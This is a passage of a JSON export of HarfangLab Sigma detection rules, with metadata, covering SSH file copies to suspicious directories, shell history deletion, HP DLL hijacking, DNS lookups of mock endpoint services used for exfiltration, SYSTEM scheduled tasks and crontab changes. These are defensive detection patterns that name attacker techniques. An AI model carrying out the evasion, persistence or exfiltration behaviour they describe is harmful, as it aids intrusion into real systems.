'.jpeg.filepart'\n - '.pdf'\n - '.pdf.filepart'\n - '.csv'\n - '.csv.filepart'\n - '.xml'\n - '.xml.filepart'\n - '.svg'\n - '.svg.filepart'\n - '.ttf'\n - '.ttf.filepart'\n - '.ico'\n - '.ico.filepart'\n - '.sql'\n\n # Avoids false positives when updating a website's content\n exclusion_website:\n Path|contains:\n - '/nodejs/'\n - '/node_modules/'\n - '/vendor/'\n - '/locale/'\n - '/assets/'\n - '/application/'\n - '/docs/'\n - '/templates/'\n\n exclusion_ansible:\n Path|contains:\n - '/ansible-tmp-*/*.py'\n - '/ansible-tmp-*/source'\n - '/.ansible-tmp-*/*.py'\n - '/.ansible-tmp-*/source'\n\n exclusion_sudo_bootstrap:\n Path: '/tmp/.sudo_bootstrap????????-????-????-????-????????????.sh'\n\n exclusion_veeam:\n Path:\n - '/tmp/VeeamApp*'\n - '/tmp/VeeamAgent*'\n - '/tmp/vee????????-????-????-????-????????????/.veeamlib.tar'\n\n exclusion_alfresco:\n Path|startswith:\n - '/tmp/recup-ipar-alf/acs/alfresco-content-services-community-distribution-*/alf_data/contentstore/'\n - '/var/tmp/recup-ipar-alf/acs/alfresco-content-services-community-distribution-*/alf_data/contentstore/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4f7f72d0-446d-4b85-9c35-0feebc738c90",
"rule_name": "Remote File Copied via SSH to Suspicious Directory",
"rule_description": "Detects the copy of a file to a suspicious or unusual directory from a remote host using SSH or one of its utilities (like scp).\nAdversaries may transfer tools or other files from an external system into a compromised environment as part of their malicious activity.\nIt is recommended to investigate the context of this action to determine whether the file copy is legitimate.\n",
"rule_creation_date": "2024-02-26",
"rule_modified_date": "2025-06-05",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.initial_access",
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1105",
"attack.t1133"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4f8964a4-5740-479c-8358-30799f2df2d6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611786Z",
"creation_date": "2026-03-23T11:45:34.611790Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611797Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/003/"
],
"name": "t1070_003_shell_history_removed_linux.yml",
"content": "title: Shell History File Removed\nid: 4f8964a4-5740-479c-8358-30799f2df2d6\ndescription: |\n Detects an attempt to remove any of the common shell history files.\n Attackers can try to remove the history file to hide their tracks.\n It is recommended to investigate the process performing the deletion to look for malicious content or actions as well as to look for other suspicious behavior in this user session.\nreferences:\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2022/11/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n Path|startswith:\n - '/home/'\n - '/root/'\n Path|endswith:\n - '/.history'\n - '/.ash_history'\n - '/.bash_history'\n - '/.tcsh_history'\n - '/.sh_history'\n - '/.zsh_history'\n - '/fish_history'\n\n selection_kind:\n Kind:\n - 'remove'\n - 'rename' # In case the file is moved to the trash bin\n\n exclusion_docker:\n ProcessImage:\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/snap/docker/*/bin/dockerd'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_plesk:\n ProcessCommandLine|startswith: '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n\n exclusion_delete_user:\n - ProcessImage:\n - '/usr/sbin/luserdel'\n - '/usr/sbin/userdel'\n - ProcessCommandLine: '/usr/bin/perl /usr/sbin/deluser *'\n\n exclusion_gvfs:\n ProcessImage: '/usr/libexec/gvfsd-trash'\n\n exclusion_rsync:\n ProcessImage: '/usr/bin/rsync'\n\n exclusion_ksh:\n ProcessImage: '/usr/bin/ksh93'\n ProcessCommandLine: '-ksh'\n ProcessParentImage:\n - '/usr/bin/su'\n - '/usr/sbin/sshd'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4f8964a4-5740-479c-8358-30799f2df2d6",
"rule_name": "Shell History File Removed",
"rule_description": "Detects an attempt to remove any of the common shell history files.\nAttackers can try to remove the history file to hide their tracks.\nIt is recommended to investigate the process performing the deletion to look for malicious content or actions as well as to look for other suspicious behavior in this user session.\n",
"rule_creation_date": "2022-11-15",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4fc22311-870c-4261-885e-2d7e461df964",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096119Z",
"creation_date": "2026-03-23T11:45:34.096122Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096128Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims",
"https://www.contextis.com/en/blog/dll-search-order-hijacking",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hp_imaging.yml",
"content": "title: DLL Hijacking via HP Imaging Software\nid: 4fc22311-870c-4261-885e-2d7e461df964\ndescription: |\n Detects potential Windows DLL Hijacking via HP Imaging Software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims\n - https://www.contextis.com/en/blog/dll-search-order-hijacking\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EWSProxy.Exe'\n ProcessSignature: 'Hewlett Packard'\n ImageLoaded|endswith: '\\ScanImageui.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\HP\\Digital Imaging\\bin\\'\n - '?:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\'\n - '?:\\Program Files\\HP\\HP Scan Extended\\bin\\'\n - '?:\\Program Files (x86)\\HP\\HP Scan Extended\\bin\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\HP\\Digital Imaging\\bin\\'\n - '?:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\'\n - '?:\\Program Files\\HP\\HP Scan Extended\\bin\\'\n - '?:\\Program Files (x86)\\HP\\HP Scan Extended\\bin\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 
'Hewlett Packard'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4fc22311-870c-4261-885e-2d7e461df964",
"rule_name": "DLL Hijacking via HP Imaging Software",
"rule_description": "Detects potential Windows DLL Hijacking via HP Imaging Software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4fd851cb-ec8d-4cc6-ae02-1405584f3b23",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625346Z",
"creation_date": "2026-03-23T11:45:34.625348Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625353Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1567_mock_endpoint_dns_request.yml",
"content": "title: DNS Resolution of a Mock Endpoint\nid: 4fd851cb-ec8d-4cc6-ae02-1405584f3b23\ndescription: |\n Detects a DNS resolution request of a mock endpoint service such as Mockbin.\n Mock endpoint services allow developers to simulate API responses.\n Attackers can use them to exfiltrate stolen data stealthily, or to host and deliver malicious payloads to infected hosts.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2023/09/07\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName:\n - 'mockbin.org'\n - 'run.mocky.io'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n # https://newtonpaul.com/svchost-analysis-and-internet-sharing-triage/\n exclusion_sharedaccess:\n ProcessCommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s SharedAccess'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_mcafee:\n ProcessImage: '?:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe'\n\n 
exclusion_cybereason:\n ProcessImage: '?:\\Program Files\\Cybereason ActiveProbe\\minionhost.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Cybereason Inc'\n - 'Cybereason Inc.'\n - 'Cybereason, Inc'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4fd851cb-ec8d-4cc6-ae02-1405584f3b23",
"rule_name": "DNS Resolution of a Mock Endpoint",
"rule_description": "Detects a DNS resolution request of a mock endpoint service such as Mockbin.\nMock endpoint services allow developers to simulate API responses.\nAttackers can use them to exfiltrate stolen data stealthily, or to host and deliver malicious payloads to infected hosts.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2023-09-07",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5043ae9d-7660-4103-8092-bd964e56e775",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092199Z",
"creation_date": "2026-03-23T11:45:34.092201Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092205Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_system_scheduled_task.yml",
"content": "title: System Scheduled Task Created\nid: 5043ae9d-7660-4103-8092-bd964e56e775\ndescription: |\n Detects the creation of a Scheduled Task that is set to run by the SYSTEM user.\n The Task Scheduler Service in Windows is used to create and execute Scheduled Tasks, which can be used to launch programs, send emails or call COM objects according to different triggers.\n Scheduled Tasks can be used by attackers to set up persistence; having a Scheduled Task run as SYSTEM could potentially indicate persistence and give an attacker the highest privileges on the local machine.\n It is recommended to determine whether this is part of a persistence mechanism or normal endpoint/software behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2021/10/11\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.exe'\n selection_2:\n - CommandLine|contains: '/create '\n # We can't simply match against \"SYSTEM\" as it might be part of a path (C:\\Windows\\System32\\)\n # so we ensure it's either at the very end of the command line, or it is followed by a white space.\n selection_3:\n - CommandLine|endswith: '/ru*SYSTEM'\n - CommandLine|contains: '/ru*SYSTEM '\n\n exclusion_programfiles:\n CommandLine|contains:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_teamviewer:\n # C:\\WINDOWS\\system32\\schtasks /Create /TN TVInstallRestore /TR \"C:\\Users\\xxxxxx\\AppData\\Local\\Temp\\TeamViewer\\update.exe /RESTORE\" /RU SYSTEM /SC ONLOGON /F\n # C:\\WINDOWS\\system32\\schtasks /Create /TN TVInstallRestore /TR \"C:\\Program Files (x86)\\TeamViewer\\Update\\update.exe /RESTORE\" /RU SYSTEM /SC ONLOGON /F\n CommandLine|contains|all:\n - '/Create /TN TVInstallRestore /TR'\n - '/RU SYSTEM /SC ONLOGON /F'\n\n exclusion_wapt:\n CommandLine|contains:\n - ' waptservice'\n - 'fullwaptupgrade'\n ParentImage|endswith: '\\cmd.exe'\n # c:\\Program Files (x86)\\wapt\\waptpython.exe / E:\\wapt\\waptpython.exe\n GrandparentImage|endswith:\n - '\\wapt\\waptpython.exe'\n - '\\wapt\\wapt-get.exe'\n\n exclusion_wapt_2:\n # schtasks /Create /SC ONCE /TN waptservicerestart /TR 'cmd.exe' /C net stop waptservice & net start waptservice /ST 08:07:31 /RU SYSTEM /F /V1 /Z\n CommandLine: 'schtasks /Create /SC ONCE /TN waptservicerestart /TR ?cmd.exe? /C net stop waptservice & net start waptservice *'\n\n exclusion_avira:\n CommandLine|contains:\n - ' AviraSystemSpeedupUpdate'\n - ' /TN Avira_Security_Update /TR '\n ParentImage|endswith:\n - '\\avira_speedup_setup_update.tmp'\n - '\\avira_spotlight_setup.tmp'\n GrandparentImage:\n - '?:\\ProgramData\\Avira\\SystemSpeedup\\Update\\avira_speedup_setup_update.exe'\n - '?:\\ProgramData\\Avira\\Security\\Temp\\avira_spotlight_setup.exe'\n # C:\\ProgramData\\Avira\\Security\\Update\\297fd79d-191e-4587-9348-4803c4e32b32\\avira_spotlight_setup.exe\n - '?:\\ProgramData\\Avira\\Security\\Update\\\\*\\avira_spotlight_setup.exe'\n\n exclusion_symantec:\n CommandLine|contains|all:\n - 'Symantec CleanWipe'\n - '\\CleanWipe.exe'\n ParentImage|endswith: '\\CleanWipe\\CleanWipe.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_mplnet:\n ParentImage: '?:\\MPLNET\\Inventory.exe'\n\n exclusion_bigfixenterprise:\n GrandparentImage: '?:\\Program Files (x86)\\BigFix Enterprise\\BES Client\\BESClient.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Legitimate use of a SYSTEM scheduled task by the system administrator or services\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5043ae9d-7660-4103-8092-bd964e56e775",
"rule_name": "System Scheduled Task Created",
"rule_description": "Detects the creation of a Scheduled Task that is set to run by the SYSTEM user.\nThe Task Scheduler Service in Windows is used to create and execute Scheduled Tasks, which can be used to launch programs, send emails or call COM objects according to different triggers.\nScheduled Tasks can be used by attackers to set up persistence; having a Scheduled Task run as SYSTEM could potentially indicate persistence and give an attacker the highest privileges on the local machine.\nIt is recommended to determine whether this is part of a persistence mechanism or normal endpoint/software behavior.\n",
"rule_creation_date": "2021-10-11",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5046eefb-f36f-4d3a-a86e-0e7c3ddfcccc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.705674Z",
"creation_date": "2026-03-23T11:45:34.612147Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612154Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_etc_crontab_modified_linux.yml",
"content": "title: Crontab-Related Files Modified\nid: 5046eefb-f36f-4d3a-a86e-0e7c3ddfcccc\ndescription: |\n Detects a suspicious attempt to modify \"/etc/crontab\" or other crontab-related files.\n These files contain scheduled tasks, usually run with root privileges, to help maintain the system.\n An attacker could use this files to add a malicious cron jobs for persistence.\n It is recommended to check the modified crontab file for malicious content as well as to look for other suspicious actions related to the process responsible for this modification.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/crontab'\n - '/etc/cron.*/*'\n - '/var/spool/cron/crontabs/*'\n - TargetPath:\n - '/etc/crontab'\n - '/etc/cron.*/*'\n - '/var/spool/cron/crontabs/*'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - 
ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_cron:\n - ProcessImage|endswith: '/cron'\n - ProcessParentImage|endswith: '/cron'\n\n exclusion_crontab:\n - ProcessCommandLine: '/bin/bash /etc/cron.daily/system-crontab'\n - ProcessImage|endswith: '/crontab'\n - ProcessParentImage|endswith: '/crontab'\n\n exclusion_common:\n ProcessImage:\n - '/bin/chmod'\n - '/usr/bin/chmod'\n - '/usr/bin/chown'\n - '/usr/bin/chgrp'\n - '/usr/bin/tar'\n\n exclusion_esmith:\n ProcessCommandLine|contains: '/e-smith/'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains: '/usr/bin/containerd-shim-runc-v2'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_puppet:\n - ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessGrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n 
